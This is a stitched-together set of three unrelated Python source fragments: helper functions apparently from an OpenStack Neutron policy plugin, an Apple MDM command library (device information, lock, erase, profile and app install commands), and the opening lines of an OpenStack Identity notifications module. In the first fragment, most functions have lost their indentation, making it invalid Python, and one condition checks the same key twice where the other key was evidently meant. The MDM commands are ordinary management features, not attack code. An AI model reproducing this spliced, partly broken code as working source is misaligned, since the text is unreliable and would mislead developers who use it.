        return True, "update parameters"
    return False, None
def _check_duplicate_ports_config(port_db):
if (len(port_db) > len([dict(t) for t in
set([tuple(d.items()) for d in port_db])])):
return True
def _check_duplicate_ports_across_config(list_port_db):
for i in range(0, len(list_port_db)):
for j in range(i + 1, len(list_port_db)):
if (len(list_port_db[i].intersection(list_port_db[j])) > 0):
return True
def _validate_port_owner(port_db):
    """
    Helper function to validate port is owned by a compute resource

    Returns True only when the port carries both the device_owner and
    binding:vif_type fields, the owner is a compute resource, and the
    VIF type is IOVisor.
    """
    if "device_owner" not in port_db or "binding:vif_type" not in port_db:
        return False
    is_compute = "compute" in port_db["device_owner"]
    is_iovisor = (port_db["binding:vif_type"] ==
                  net_pg_const.BINDING_VIF_TYPE_IOVISOR)
    return is_compute and is_iovisor
def _check_policy_service_leg_mode(ps_obj, updated_ps_obj=None):
"""
Helper function to check if bidirectional ports are
specified with ingress or egress ports
"""
if ("ingress_ports" in ps_obj and "egress_ports"
in ps_obj and "bidirectional_ports" in ps_obj):
if updated_ps_obj is None:
if ((ps_obj["ingress_ports"] or ps_obj["egress_ports"])
and ps_obj["bidirectional_ports"]):
return True
else:
if ps_obj["ingress_ports"] or ps_obj["egress_ports"]:
if ("add_bidirectional_ports" in updated_ps_obj or
"remove_bidirectional_ports" in updated_ps_obj):
return True
elif ps_obj["bidirectional_ports"]:
if ("add_ingress_ports" in updated_ps_obj or
"add_egress_ports" in updated_ps_obj or
"remove_ingress_ports" in updated_ps_obj or
"remove_egress_ports" in updated_ps_obj):
return True
else:
#Update call with any prior ports in policy service
if ((("add_ingress_ports" in updated_ps_obj or
"add_ingress_ports" in updated_ps_obj)
or ("remove_ingress_ports" in updated_ps_obj or
"remove_egress_ports" in updated_ps_obj))
and ("add_bidirectional_ports" in updated_ps_obj or
"remove_bidirectional_ports" in updated_ps_obj)):
return True
return False
def _is_security_group(context, ep_obj, ep_db, config):
if config in ep_db and ep_db[config]:
for epg in ep_db[config]:
epg_id_list = ep_obj.get_endpoint_groups(context,
filters={'id': [epg['id']]},
fields=["id"])
if len(epg_id_list) == 1:
if ("is_security_group" in epg_id_list[0]
and epg_id_list[0]["is_security_group"]):
operation = "Endpoint association"
raise policy_exc.OperationNotAllowed(operation=operation,
id=epg_id_list[0]["id"])
def _validate_ep_config(ep_db):
if ((ep_db["ip_mask"] and ep_db["ip_port"]) or
(ep_db["ip_mask"]and ep_db["port_id"]) or
(ep_db["ip_port"] and ep_db["port_id"])):
raise policy_exc.MultipleAssociationForEndpoint()
def _check_duplicates_endpoint_config(ep_db):
if "ep_groups" in ep_db and ep_db["ep_groups"]:
if (len(ep_db["ep_groups"]) > len([dict(t) for t in
set([tuple(d.items()) for d in ep_db["ep_groups"]])])):
raise policy_exc.DuplicateEndpointGroup()
if "add_endpoint_groups" in ep_db and ep_db["add_endpoint_groups"]:
if (len(ep_db["add_endpoint_groups"]) > len([dict(t) for t in
set([tuple(d.items()) for d in ep_db["add_endpoint_groups"]])])):
raise policy_exc.DuplicateEndpointGroup()
if "remove_endpoint_groups" in ep_db and ep_db["remove_endpoint_groups"]:
if (len(ep_db["remove_endpoint_groups"]) > len([dict(t) for t in
set([tuple(d.items()) for d in
ep_db["remove_endpoint_groups"]])])):
raise policy_exc.DuplicateEndpointGroup()
if (("add_endpoint_groups" in ep_db and ep_db["add_endpoint_groups"]) and
("remove_endpoint_groups" in ep_db
and ep_db["remove_endpoint_groups"])):
if (len(set([tuple(d.items()) for d in ep_db["add_endpoint_groups"]]).
intersection(set([tuple(d.items()) for d in
ep_db["remove_endpoint_groups"]]))) > 0):
raise policy_exc.DuplicateEndpointGroup()
def _process_policy_tag(self, context, epg_db):
    """
    Resolve a policy-tag reference given by name into its UUID.

    When ``epg_db["policy_tag_id"]`` is set but not UUID-like, it is
    treated as a tag name and looked up; exactly one match is required.

    Returns the (possibly updated) epg_db.

    Raises:
        PLUMgridException: when zero or multiple tags match the name.
    """
    if "policy_tag_id" in epg_db and epg_db["policy_tag_id"]:
        if (not uuidutils.is_uuid_like(epg_db['policy_tag_id']) and
                epg_db['policy_tag_id'] is not None):
            ptag_list = self.get_policy_tags(context,
                filters={'name': [epg_db['policy_tag_id']]},
                fields=["id"])
            if len(ptag_list) == 1:
                # Unambiguous name match: substitute the UUID.
                epg_db['policy_tag_id'] = ptag_list[0]["id"]
            elif len(ptag_list) == 0:
                err_message = ("No policy tag"
                               " matches found for tag"
                               " '%s'" % epg_db['policy_tag_id'])
                raise plum_excep.PLUMgridException(err_msg=err_message)
            else:
                err_message = ("Multiple policy tag"
                               " matches found for tag"
                               " '%s', use an ID to be more"
                               " specific." % epg_db['policy_tag_id'])
                raise plum_excep.PLUMgridException(err_msg=err_message)
    return epg_db
def _process_epg_update(self, context, epg_db):
    """
    Resolve the policy-tag reference in an endpoint-group update.

    Picks whichever of policy_tag_id / add_tag / remove_tag is present,
    resolves a name reference to a UUID, and loads the tag record.

    Returns an (epg_db, ptag_db) tuple; ptag_db is {} when no tag
    config is present in the update.

    Raises:
        PLUMgridException: when a tag name matches zero or multiple
            tags.
    """
    ptag_db = {}
    # Exactly one of these keys is expected to carry the tag reference.
    if "policy_tag_id" in epg_db and epg_db["policy_tag_id"]:
        config = "policy_tag_id"
    elif "add_tag" in epg_db and epg_db["add_tag"]:
        config = "add_tag"
    elif "remove_tag" in epg_db and epg_db["remove_tag"]:
        config = "remove_tag"
    else:
        config = None
    if config in epg_db and epg_db[config]:
        if (not uuidutils.is_uuid_like(epg_db[config]) and
                epg_db[config] is not None):
            # Name reference: resolve to a UUID (must be unambiguous).
            ptag_list = self.get_policy_tags(context,
                filters={'name': [epg_db[config]]},
                fields=["id"])
            if len(ptag_list) == 1:
                epg_db[config] = ptag_list[0]["id"]
                ptag_db = self.get_policy_tag(context,
                                              ptag_list[0]["id"])
            elif len(ptag_list) == 0:
                err_message = ("No policy tag"
                               " matches found for tag"
                               " '%s'" % epg_db[config])
                raise plum_excep.PLUMgridException(err_msg=err_message)
            else:
                err_message = ("Multiple policy tag"
                               " matches found for tag"
                               " '%s', use an ID to be more"
                               " specific." % epg_db[config])
                raise plum_excep.PLUMgridException(err_msg=err_message)
        elif (uuidutils.is_uuid_like(epg_db[config]) and
                epg_db[config] is not None):
            # Direct UUID reference: just load the record.
            ptag_id = epg_db[config]
            ptag_db = self.get_policy_tag(context,
                                          ptag_id)
    return (epg_db, ptag_db)
def _check_policy_service_in_use(self, context, id):
    """
    Helper function to check policy service is in use by
    any policy rule.

    Raises:
        PolicyServiceInUsePolicyRule: when any policy rule's action
            target references the given policy service id.

    Fix: the original computed ``len(filter(...))``, which raises
    TypeError on Python 3 where filter() returns an iterator; the
    membership test is now done directly.
    """
    pr_list = self.get_policy_rules(context,
                                    fields=["id", "action_target"])
    for rule in pr_list:
        if _check_remote_action_target(rule):
            # Remote targets have the form "<tenant_id>:<target_id>".
            target = rule["action_target"].split(":")[1]
        else:
            target = rule["action_target"]
        if target == id:
            raise policy_exc.PolicyServiceInUsePolicyRule(id=id)
def _recursive_delete_endpoints(self, context, id):
"""
Helper function to delete endpoints when endpoint group
is deleted
"""
endpoint_list = self.get_endpoints(context,
filters={'ep_groups': [{'id': id}]})
for endpoint in endpoint_list:
if ((len(endpoint["ep_groups"]) == 1) and
endpoint["ep_groups"][0]["id"] == id):
self.delete_endpoint(context, endpoint["id"])
def _check_remote_action_target(pr_db):
"""
Helper function to check if action target for policy rule
is for a tenant id
"""
if "action_target" in pr_db and pr_db["action_target"]:
action_target_db = pr_db["action_target"].split(":")
if len(action_target_db) == 2:
return True
else:
return False
def _update_port_description(port_db, port_data):
"""
Helper function to update port description
"""
if "description" in port_data:
port_db["description"] = port_data["description"]
| |
from enum import Enum
from uuid import uuid4, UUID
from typing import Dict, Set, List, Type, ClassVar, Any, Optional, Tuple
import semver
from base64 import urlsafe_b64encode, urlsafe_b64decode
from . import AccessRights, AccessRightsSet, Platform
PlatformVersion = str
PlatformRequirements = Dict[Platform, PlatformVersion]
class CommandRegistry(type):
    """Metaclass that maintains a registry of command classes, keyed by
    the ``request_type`` declared in each class body."""
    command_classes: Dict[str, Type] = {}

    def __new__(mcs, name, bases, namespace, **kwds):
        attrs = dict(namespace)
        new_class = type.__new__(mcs, name, bases, attrs)
        # Only classes that declare request_type in their own body are
        # registered (inherited attributes do not re-register).
        if 'request_type' in attrs:
            CommandRegistry.command_classes[attrs['request_type']] = new_class
        return new_class
class Command(metaclass=CommandRegistry):
    """Base class for MDM commands.

    Subclasses register themselves with CommandRegistry by declaring a
    ``request_type`` class attribute (see the expected class attributes
    in the commented declarations below).
    """
    # request_type: ClassVar[str] = None
    """request_type (str): The MDM RequestType, as specified in the MDM Specification."""
    # require_access: ClassVar[AccessRightsSet] = set()
    """require_access (Set[AccessRights]): Access required for the MDM to execute the command on this device."""
    # require_platforms: ClassVar[PlatformRequirements] = dict()
    """require_platforms (PlatformRequirements): A dict of Platform : version predicate string, to indicate which
    platforms will accept the command"""
    # require_supervised: ClassVar[bool] = False
    """require_supervised (bool): This command requires supervision on iOS/tvOS"""

    def __init__(self, uuid: Optional[UUID] = None) -> None:
        """The Command class wraps an MDM Request Command dict to provide validation and convenience methods for
        accessing command attributes.

        All commands are serialised to the same table as JSON, so the validation is performed here.

        Args:
              uuid (UUID): The command uuid. Defaults to an automatically generated uuid.
        """
        if uuid is None:
            uuid = uuid4()
        self._uuid: UUID = uuid
        # Free-form command parameters, exposed via the ``parameters``
        # property.
        self._attrs: Dict[str, Any] = {}
        # self.request_type: Optional[str] = None
        # self.require_access: AccessRightsSet = set()
        # self.require_platforms: PlatformRequirements = dict()
        # self.require_supervised: bool = False

    @property
    def uuid(self) -> UUID:
        # The command's unique identifier.
        return self._uuid

    @property
    def parameters(self) -> Dict[str, Any]:
        # The parameters supplied for this command instance.
        return self._attrs

    @classmethod
    def new_request_type(cls, request_type: str, parameters: dict, uuid: Optional[str] = None) -> 'Command':
        """Factory method for instantiating a command based on its class attribute ``request_type``.

        Additionally, the dict given in parameters will be applied to the command instance.
        Commands that have no parameters are not required to implement to_dict().

        Args:
              request_type (str): The command request type, as defined in the class attribute ``request_type``.
              parameters (dict): The parameters of this command instance.
              uuid (str): The command UUID. Optional, will be generated if omitted.
        Raises:
              ValueError if there is no command matching the request type given.
        Returns:
              Command class that corresponds to the request type given. Inherits from Command.
        """
        if request_type in CommandRegistry.command_classes:
            klass = CommandRegistry.command_classes[request_type]
            return klass(uuid, **parameters)
        else:
            raise ValueError('No such RequestType registered: {}'.format(request_type))

    def to_dict(self) -> dict:
        """Convert the command into a dict that will be serializable by plistlib.

        This default implementation will work for command types that have no parameters.
        """
        # ``request_type`` is supplied by the concrete subclass.
        command = {'RequestType': self.request_type}
        return {
            'CommandUUID': str(self._uuid),
            'Command': command,
        }
class DeviceInformation(Command):
    """Query a device for general, iTunes, device, and network information.

    Which queries a device answers varies by platform and OS version; use
    ``for_platform`` to build an instance restricted to supported queries
    according to the ``Requirements`` table below.
    """
    request_type = 'DeviceInformation'
    require_access = {AccessRights.QueryDeviceInformation, AccessRights.QueryNetworkInformation}

    class Queries(Enum):
        """The Queries enumeration contains all possible Query types for the DeviceInformation command."""
        # Table 5 : General Queries
        UDID = 'UDID'
        Languages = 'Languages'
        Locales = 'Locales'
        DeviceID = 'DeviceID'
        OrganizationInfo = 'OrganizationInfo'
        LastCloudBackupDate = 'LastCloudBackupDate'
        AwaitingConfiguration = 'AwaitingConfiguration'
        AutoSetupAdminAccounts = 'AutoSetupAdminAccounts'
        # Table 6 : iTunes Account
        iTunesStoreAccountIsActive = 'iTunesStoreAccountIsActive'
        iTunesStoreAccountHash = 'iTunesStoreAccountHash'
        # Table 7 : Device Queries
        DeviceName = 'DeviceName'
        OSVersion = 'OSVersion'
        BuildVersion = 'BuildVersion'
        ModelName = 'ModelName'
        Model = 'Model'
        ProductName = 'ProductName'
        SerialNumber = 'SerialNumber'
        DeviceCapacity = 'DeviceCapacity'
        AvailableDeviceCapacity = 'AvailableDeviceCapacity'
        BatteryLevel = 'BatteryLevel'
        CellularTechnology = 'CellularTechnology'
        IMEI = 'IMEI'
        MEID = 'MEID'
        ModemFirmwareVersion = 'ModemFirmwareVersion'
        IsSupervised = 'IsSupervised'
        IsDeviceLocatorServiceEnabled = 'IsDeviceLocatorServiceEnabled'
        IsActivationLockEnabled = 'IsActivationLockEnabled'
        IsDoNotDisturbInEffect = 'IsDoNotDisturbInEffect'
        EASDeviceIdentifier = 'EASDeviceIdentifier'
        IsCloudBackupEnabled = 'IsCloudBackupEnabled'
        OSUpdateSettings = 'OSUpdateSettings'
        LocalHostName = 'LocalHostName'
        HostName = 'HostName'
        SystemIntegrityProtectionEnabled = 'SystemIntegrityProtectionEnabled'
        ActiveManagedUsers = 'ActiveManagedUsers'
        IsMDMLostModeEnabled = 'IsMDMLostModeEnabled'
        MaximumResidentUsers = 'MaximumResidentUsers'
        # Table 9 : Network Information Queries
        ICCID = 'ICCID'
        BluetoothMAC = 'BluetoothMAC'
        WiFiMAC = 'WiFiMAC'
        EthernetMACs = 'EthernetMACs'
        CurrentCarrierNetwork = 'CurrentCarrierNetwork'
        SIMCarrierNetwork = 'SIMCarrierNetwork'
        SubscriberCarrierNetwork = 'SubscriberCarrierNetwork'
        CarrierSettingsVersion = 'CarrierSettingsVersion'
        PhoneNumber = 'PhoneNumber'
        VoiceRoamingEnabled = 'VoiceRoamingEnabled'
        DataRoamingEnabled = 'DataRoamingEnabled'
        IsRoaming = 'IsRoaming'
        PersonalHotspotEnabled = 'PersonalHotspotEnabled'
        SubscriberMCC = 'SubscriberMCC'
        SubscriberMNC = 'SubscriberMNC'
        CurrentMCC = 'CurrentMCC'
        CurrentMNC = 'CurrentMNC'
        # Maybe undocumented
        CurrentConsoleManagedUser = 'CurrentConsoleManagedUser'

    # Minimum platform/OS requirements per query, keyed by the query's
    # *string* value. Queries absent from this table are treated as
    # universally supported.
    Requirements = {
        'Languages': [
            (Platform.iOS, '>=7'),
            (Platform.tvOS, '>=6'),
            (Platform.macOS, '>=10.10'),
        ],
        'Locales': [
            (Platform.iOS, '>=7'),
            (Platform.tvOS, '>=6'),
            (Platform.macOS, '>=10.10'),
        ],
        'DeviceID': [
            (Platform.tvOS, '>=6'),
        ],
        'OrganizationInfo': [
            (Platform.iOS, '>=7'),
        ],
        'LastCloudBackupDate': [
            (Platform.iOS, '>=8'),
            (Platform.macOS, '>=10.10')
        ],
        'AwaitingConfiguration': [
            (Platform.iOS, '>=9'),
        ],
        'AutoSetupAdminAccounts': [
            (Platform.macOS, '>=10.11')
        ],
        'BatteryLevel': [
            (Platform.iOS, '>=5')
        ],
        'CellularTechnology': [
            (Platform.iOS, '>=4.2.6')
        ],
        'iTunesStoreAccountIsActive': [
            (Platform.iOS, '>=7'),
            (Platform.macOS, '>=10.9')
        ],
        'iTunesStoreAccountHash': [
            (Platform.iOS, '>=8'),
            (Platform.macOS, '>=10.10')
        ],
        'IMEI': [
            (Platform.iOS, '*'),
        ],
        'MEID': [
            (Platform.iOS, '*'),
        ],
        'ModemFirmwareVersion': [
            (Platform.iOS, '*'),
        ],
        'IsSupervised': [
            (Platform.iOS, '>=6'),
        ],
        'IsDeviceLocatorServiceEnabled': [
            (Platform.iOS, '>=7'),
        ],
        'IsActivationLockEnabled': [
            (Platform.iOS, '>=7'),
            (Platform.macOS, '>=10.9')
        ],
        'IsDoNotDisturbInEffect': [
            (Platform.iOS, '>=7'),
        ],
        'EASDeviceIdentifier': [
            (Platform.iOS, '>=7'),
            (Platform.macOS, '>=10.9'),
        ],
        'IsCloudBackupEnabled': [
            (Platform.iOS, '>=7.1'),
        ],
        'OSUpdateSettings': [
            (Platform.macOS, '>=10.11'),
        ],
        'LocalHostName': [
            (Platform.macOS, '>=10.11'),
        ],
        'HostName': [
            (Platform.macOS, '>=10.11'),
        ],
        'SystemIntegrityProtectionEnabled': [
            (Platform.macOS, '>=10.12'),
        ],
        'ActiveManagedUsers': [
            (Platform.macOS, '>=10.11'),
        ],
        'IsMDMLostModeEnabled': [
            (Platform.iOS, '>=9.3'),
        ],
        'MaximumResidentUsers': [
            (Platform.iOS, '>=9.3'),
        ]
    }

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super(DeviceInformation, self).__init__(uuid)
        self._attrs = kwargs

    @classmethod
    def for_platform(cls, platform: Platform, min_os_version: str, queries: Set[Queries] = None) -> 'DeviceInformation':
        """Generate a command that is compatible with the specified platform and OS version.

        Args:
            platform (Platform): Desired target platform
            min_os_version (str): Desired OS version
            queries (Set[Queries]): Desired Queries, or default to ALL queries.
        Returns:
            DeviceInformation instance with supported queries.
        """
        def supported(query: str) -> bool:
            # Queries without an entry in Requirements are assumed supported
            # everywhere.
            if query not in cls.Requirements:
                return True
            for req_platform, req_min_version in cls.Requirements[query]:
                if req_platform != platform:
                    continue
                # TODO: version checking — semver only takes maj.min.patch
                # return semver.match(min_os_version, req_min_version)
                return True
            return False

        if queries is None:
            candidates = [q.value for q in cls.Queries]
        else:
            # BUG FIX: Requirements (and the serialised plist) are keyed by
            # the query's string value. Previously, Queries enum members were
            # compared directly against the string keys (never matching) and
            # ended up, unserialisable, in the command. Normalise to strings.
            candidates = [q.value if isinstance(q, cls.Queries) else q
                          for q in queries]
        return cls(Queries=[q for q in candidates if supported(q)])

    @property
    def queries(self) -> Optional[List[str]]:
        """The requested query names (a list of strings), or None if unset."""
        return self._attrs.get('Queries')

    def to_dict(self) -> dict:
        """Convert the command into a dict that will be serializable by plistlib."""
        return {
            'CommandUUID': str(self._uuid),
            'Command': {
                'RequestType': type(self).request_type,
                'Queries': self._attrs.get('Queries', None),
            }
        }
class SecurityInfo(Command):
    """Query security-related information from the device."""
    request_type = 'SecurityInfo'
    require_access = {AccessRights.SecurityQueries}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super().__init__(uuid)
        self._attrs = dict(kwargs)
class DeviceLock(Command):
    """Lock the device immediately, optionally with a message, PIN, and phone number."""
    request_type = 'DeviceLock'
    require_access = {AccessRights.DeviceLockPasscodeRemoval}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super().__init__(uuid)
        self._attrs = kwargs

    def to_dict(self) -> dict:
        """Serialise to a plistlib-compatible dict; PIN/PhoneNumber only appear when set."""
        payload = {
            'RequestType': type(self).request_type,
            'Message': self._attrs.get('Message', 'Device is locked'),
        }
        for optional_key in ('PIN', 'PhoneNumber'):
            if optional_key in self._attrs:
                payload[optional_key] = self._attrs[optional_key]
        return {
            'CommandUUID': str(self._uuid),
            'Command': payload,
        }
class ClearPasscode(Command):
    """Clear the device passcode using an escrowed UnlockToken (iOS only)."""
    request_type = 'ClearPasscode'
    require_access = {AccessRights.DeviceLockPasscodeRemoval}
    require_platforms = {Platform.iOS: '*'}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super().__init__(uuid)
        self._attrs = kwargs

    def to_dict(self) -> dict:
        # UnlockToken is stored base64-encoded; decode back to bytes for the plist.
        unlock_token = urlsafe_b64decode(self._attrs['UnlockToken'])
        return {
            'CommandUUID': str(self._uuid),
            'Command': {
                'RequestType': type(self).request_type,
                'UnlockToken': unlock_token,
            },
        }
class ProfileList(Command):
    """Ask the device for its list of installed configuration profiles."""
    request_type = 'ProfileList'
    require_access = {AccessRights.ProfileInspection}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super().__init__(uuid)
        self._attrs = dict(kwargs)
class InstallProfile(Command):
    """Install a configuration profile on the device.

    Accepts either a ``profile`` object (whose ``.data`` attribute holds the
    raw profile bytes) or a pre-encoded ``Payload`` keyword.
    """
    request_type = 'InstallProfile'
    require_access = {AccessRights.ProfileInstallRemove}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super().__init__(uuid)
        self._attrs = kwargs
        if 'profile' in self._attrs:
            # Store the payload base64-encoded so the attrs remain
            # JSON-serialisable; decoded again in to_dict().
            raw = self._attrs.pop('profile').data
            self._attrs['Payload'] = urlsafe_b64encode(raw).decode('utf-8')

    def to_dict(self) -> dict:
        return {
            'CommandUUID': str(self._uuid),
            'Command': {
                'RequestType': type(self).request_type,
                'Payload': urlsafe_b64decode(self._attrs['Payload']),
            },
        }
class RemoveProfile(Command):
    """Remove a configuration profile identified by its payload ``Identifier``."""
    request_type = 'RemoveProfile'
    require_access = {AccessRights.ProfileInstallRemove}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super().__init__(uuid)
        self._attrs = {'Identifier': kwargs.get('Identifier')}

    def to_dict(self) -> dict:
        """Convert the command into a dict that will be serializable by plistlib."""
        return {
            'CommandUUID': str(self._uuid),
            'Command': {
                'RequestType': type(self).request_type,
                'Identifier': self._attrs.get('Identifier'),
            },
        }
class CertificateList(Command):
    """Ask the device for the list of installed certificates."""
    request_type = 'CertificateList'
    require_access = {AccessRights.ProfileInspection}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super().__init__(uuid)
        self._attrs = dict(kwargs)
class ProvisioningProfileList(Command):
    """Ask the device for the list of installed provisioning profiles."""
    request_type = 'ProvisioningProfileList'
    require_access = {AccessRights.ProfileInspection}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs):
        super().__init__(uuid)
        self._attrs = dict(kwargs)
class InstalledApplicationList(Command):
    """List the applications installed on the device.

    Optional parameters:

    - ``ManagedAppsOnly`` (bool): restrict the listing to managed apps.
    - ``Identifiers`` (List[str]): restrict the listing to these bundle ids.
    """
    request_type = 'InstalledApplicationList'
    require_access: Set[AccessRights] = set()

    def __init__(self, uuid: Optional[UUID]=None, **kwargs):
        super(InstalledApplicationList, self).__init__(uuid)
        self._attrs = {}
        self._attrs.update(kwargs)

    @property
    def managed_apps_only(self) -> Optional[bool]:
        return self._attrs.get('ManagedAppsOnly', None)

    @managed_apps_only.setter
    def managed_apps_only(self, value: bool) -> None:
        self._attrs['ManagedAppsOnly'] = value

    @property
    def identifiers(self) -> Optional[List[str]]:
        return self._attrs.get('Identifiers', None)

    @identifiers.setter
    def identifiers(self, bundle_ids: List[str]) -> None:
        """NOTE: setting identifiers for macOS 10.12 causes an exception in mdmclient."""
        self._attrs['Identifiers'] = bundle_ids

    def to_dict(self) -> dict:
        """Convert the command into a dict that will be serializable by plistlib.

        BUG FIX: serialise from a copy — the previous implementation updated
        ``self._attrs`` in place, permanently injecting 'RequestType' into the
        command parameters as a side effect of serialisation.
        """
        command = dict(self._attrs)
        command['RequestType'] = type(self).request_type
        return {
            'CommandUUID': str(self._uuid),
            'Command': command,
        }
class InstallApplication(Command):
    """Install an application on the device.

    Accepts either an ``application`` model object (its ``itunes_store_id`` is
    used and management flags are applied), or raw command attributes passed
    as keywords.
    """
    request_type = 'InstallApplication'
    require_access = {AccessRights.ManageApps}

    def __init__(self, uuid: Optional[UUID]=None, **kwargs) -> None:
        super(InstallApplication, self).__init__(uuid)
        self._attrs = {}
        if 'application' in kwargs:
            app = kwargs['application']
            self._attrs['iTunesStoreID'] = app.itunes_store_id
            # NOTE(review): ManagementFlags=1 / 'Managed' state presumably
            # marks the app as MDM-managed — confirm against the MDM spec.
            self._attrs['ManagementFlags'] = 1
            self._attrs['ChangeManagementState'] = 'Managed'
        else:
            self._attrs.update(kwargs)

    @property
    def itunes_store_id(self) -> Optional[int]:
        """The iTunes Store ID of the app to install, if set."""
        return self._attrs.get('iTunesStoreID', None)

    @itunes_store_id.setter
    def itunes_store_id(self, id: int):
        self._attrs['iTunesStoreID'] = id
        # Default the purchase method when not already specified.
        # NOTE(review): PurchaseMethod=1 meaning assumed from the MDM spec —
        # confirm.
        if 'Options' not in self._attrs:
            self._attrs['Options'] = {}
        if 'PurchaseMethod' not in self._attrs['Options']:
            self._attrs['Options']['PurchaseMethod'] = 1

    def to_dict(self) -> dict:
        """Serialise to a plistlib-compatible dict.

        BUG FIX: removed a stray debug ``print(cmd)`` that wrote every
        serialised command to stdout.
        """
        cmd = super(InstallApplication, self).to_dict()
        cmd['Command'].update(self._attrs)
        return cmd
class ManagedApplicationList(Command):
    """MDM ``ManagedApplicationList`` command; requires app-management rights."""
    request_type = 'ManagedApplicationList'
    require_access = {AccessRights.ManageApps}


class RestartDevice(Command):
    """MDM ``RestartDevice`` command; iOS 10.3+, requires lock/passcode rights."""
    request_type = 'RestartDevice'
    require_access = {AccessRights.DeviceLockPasscodeRemoval}
    require_platforms = {Platform.iOS: '>=10.3'}


class ShutDownDevice(Command):
    """MDM ``ShutDownDevice`` command; iOS 10.3+ / macOS 10.13+."""
    request_type = 'ShutDownDevice'
    require_access = {AccessRights.DeviceLockPasscodeRemoval}
    require_platforms = {Platform.iOS: '>=10.3', Platform.macOS: '>=10.13'}


class EraseDevice(Command):
    """MDM ``EraseDevice`` command; any iOS, macOS 10.8+, requires erase rights."""
    request_type = 'EraseDevice'
    require_access = {AccessRights.DeviceErase}
    require_platforms = {Platform.iOS: '*', Platform.macOS: '>=10.8'}


class RequestMirroring(Command):
    """MDM ``RequestMirroring`` command; iOS 7+ / macOS 10.10+."""
    request_type = 'RequestMirroring'
    require_platforms = {Platform.iOS: '>=7', Platform.macOS: '>=10.10'}


class StopMirroring(Command):
    """MDM ``StopMirroring`` command; iOS 7+ / macOS 10.10+, supervised only."""
    request_type = 'StopMirroring'
    require_platforms = {Platform.iOS: '>=7', Platform.macOS: '>=10.10'}
    require_supervised = True


class Restrictions(Command):
    """MDM ``Restrictions`` command; requires restriction/profile inspection rights."""
    request_type = 'Restrictions'
    require_access = {AccessRights.RestrictionQueries, AccessRights.ProfileInspection}


class UsersList(Command):
    """MDM ``UsersList`` command; iOS 9.3+."""
    request_type = 'UsersList'
    require_platforms = {Platform.iOS: '>=9.3'}


class LogOutUser(Command):
    """MDM ``LogOutUser`` command; iOS 9.3+."""
    request_type = 'LogOutUser'
    require_platforms = {Platform.iOS: '>=9.3'}


class DeleteUser(Command):
    """MDM ``DeleteUser`` command; iOS 9.3+."""
    request_type = 'DeleteUser'
    require_platforms = {Platform.iOS: '>=9.3'}


class EnableLostMode(Command):
    """MDM ``EnableLostMode`` command; iOS 9.3+, supervised only."""
    request_type = 'EnableLostMode'
    require_platforms = {Platform.iOS: '>=9.3'}
    require_supervised = True


class DisableLostMode(Command):
    """MDM ``DisableLostMode`` command; iOS 9.3+, supervised only."""
    request_type = 'DisableLostMode'
    require_platforms = {Platform.iOS: '>=9.3'}
    require_supervised = True


class DeviceLocation(Command):
    """MDM ``DeviceLocation`` command; iOS 9.3+, supervised only."""
    request_type = 'DeviceLocation'
    require_platforms = {Platform.iOS: '>=9.3'}
    require_supervised = True


class PlayLostModeSound(Command):
    """MDM ``PlayLostModeSound`` command; iOS 10.3+, supervised only."""
    request_type = 'PlayLostModeSound'
    require_platforms = {Platform.iOS: '>=10.3'}
    require_supervised = True


class AvailableOSUpdates(Command):
    """MDM ``AvailableOSUpdates`` command; macOS 10.11+ / iOS 4+."""
    request_type = 'AvailableOSUpdates'
    require_platforms = {Platform.macOS: '>=10.11', Platform.iOS: '>=4'}
class Settings(Command):
    """Change one or more device settings in a single MDM command.

    Each recognised keyword becomes one entry in the command's ``Settings``
    array; a pre-built list may also be supplied via ``settings=`` in kwargs,
    in which case the keyword-derived entries are appended to it.
    """
    request_type = 'Settings'
    require_platforms = {Platform.macOS: '>=10.9', Platform.iOS: '>=5.0'}
    require_access = {AccessRights.ChangeSettings}

    def __init__(self,
                 uuid: Optional[UUID]=None,
                 device_name: Optional[str]=None,
                 hostname: Optional[str]=None,
                 voice_roaming: Optional[bool]=None,
                 personal_hotspot: Optional[bool]=None,
                 wallpaper=None,
                 data_roaming: Optional[bool]=None,
                 bluetooth: Optional[bool]=None,
                 **kwargs) -> None:
        """Build the Settings command.

        Args:
            uuid (UUID): Command uuid; generated if omitted.
            device_name (str): Sets the DeviceName item when given.
            hostname (str): Sets the HostName item when given.
            voice_roaming (bool): Enables/disables VoiceRoaming when given.
            personal_hotspot (bool): Enables/disables PersonalHotspot when given.
            wallpaper: Accepted for API compatibility but NOT implemented —
                no Wallpaper setting item is ever emitted.
            data_roaming (bool): Enables/disables DataRoaming when given.
            bluetooth (bool): Enables/disables Bluetooth when given.
            **kwargs: ``settings`` may carry a pre-built list of setting dicts.
        """
        super(Settings, self).__init__(uuid)
        settings: List[Dict[str, Any]] = kwargs.get('settings', [])
        self._attrs['settings'] = settings
        if device_name is not None:
            settings.append({'Item': 'DeviceName', 'DeviceName': device_name})
        if hostname is not None:
            settings.append({'Item': 'HostName', 'HostName': hostname})
        if voice_roaming is not None:
            settings.append({'Item': 'VoiceRoaming', 'Enabled': voice_roaming})
        if personal_hotspot is not None:
            settings.append({'Item': 'PersonalHotspot', 'Enabled': personal_hotspot})
        if data_roaming is not None:
            settings.append({'Item': 'DataRoaming', 'Enabled': data_roaming})
        if bluetooth is not None:
            settings.append({'Item': 'Bluetooth', 'Enabled': bluetooth})
        # TODO: implement the Wallpaper setting item; the ``wallpaper``
        # argument is currently accepted but silently ignored.

    def to_dict(self) -> dict:
        """Serialise to a plistlib-compatible dict."""
        return {
            'CommandUUID': str(self._uuid),
            'Command': {
                'RequestType': type(self).request_type,
                'Settings': self._attrs['settings'],
            }
        }
| |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Notifications module for OpenStack Identity Service resources"""
import collections
